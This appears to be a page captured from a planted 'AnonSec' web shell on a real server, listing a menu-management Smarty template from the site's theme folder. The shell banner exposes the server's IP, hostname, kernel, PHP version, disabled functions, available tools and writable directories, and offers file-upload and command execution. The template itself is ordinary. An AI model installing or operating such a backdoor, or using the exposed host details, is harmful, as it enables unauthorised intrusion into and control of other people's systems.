AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.216.139
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/www/lrsys_apps/hexagon/ui/theme/lrsys/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/www/lrsys_apps/hexagon/ui/theme/lrsys/list-horizontal-menus.tpl
{include file="sections/header.tpl"}
<div class="row">
    <div class="col-md-12">
        <div class="ibox float-e-margins">
            <div class="ibox-title">
                <h5>Menus</h5>

            </div>
            <div class="ibox-content">
                <a href="#" class="btn btn-success" id="add_new_menu"><i class="fa fa-plus"></i> {$_L['Add New Menu']}</a>
                <a href="{$_url}reorder/horizontal_menus/" class="btn btn-primary"><i class="fa fa-download"></i> {$_L['Reorder']}</a>

                <br>
                <br>
                <table class="table table-striped table-bordered">
                    <th>{$_L['Title']}</th>
                    <th>Alias</th>
                    <th>{$_L['Icon Class']}</th>
                    <th>Url</th>
                    <th>{$_L['Manage']}</th>
                    {foreach $menus as $u}
                        <tr>
                            <td>{$u['title']}</td>
                            <td>{$u['alias']}</td>
                            <td>{$u['icon_class']}</td>
                            <td>{$u['url']}</td>
                            <td>
                                <a href="{$_url}horizontal_menus/plugins/{$u['id']}/{$u['alias']}" class="btn btn-xs btn-info">{$_L['Relate Plugins']}</a>
                                <a href="#" class="btn btn-xs btn-warning edit" data-id="{$u['id']}"
									data-title="{$u['title']}" data-alias="{$u['alias']}" data-url="{$u['url']}"
								   data-icon_class="{$u['icon_class']}"><i class="fa fa-pencil"></i> {$_L['Edit']}</a>
                                <a href='#' id="{$u['id']}" class="btn btn-xs btn-danger cdelete"><i class="fa fa-trash"></i> {$_L['Delete']}</a>
                            </td>
                        </tr>
                    {/foreach}
                </table>

            </div>
        </div>



    </div>



</div>



<input type="hidden"  id="_msg_add_new_menu" value="{$_L['Add New Menu']}">
<input type="hidden"  id="_msg_title" value="{$_L['Title']}">
<input type="hidden"  id="_msg_alias" value="Alias">
<input type="hidden"  id="_msg_icon_class" value="{$_L['Icon Class']}">
<input type="hidden"  id="_msg_edit" value="{$_L['Edit']}">
<input type="hidden"  id="_msg_ok" value="{$_L['OK']}">
<input type="hidden"  id="_msg_cancel" value="{$_L['Cancel']}">
{include file="sections/footer.tpl"}

Anon7 - 2022
AnonSec Team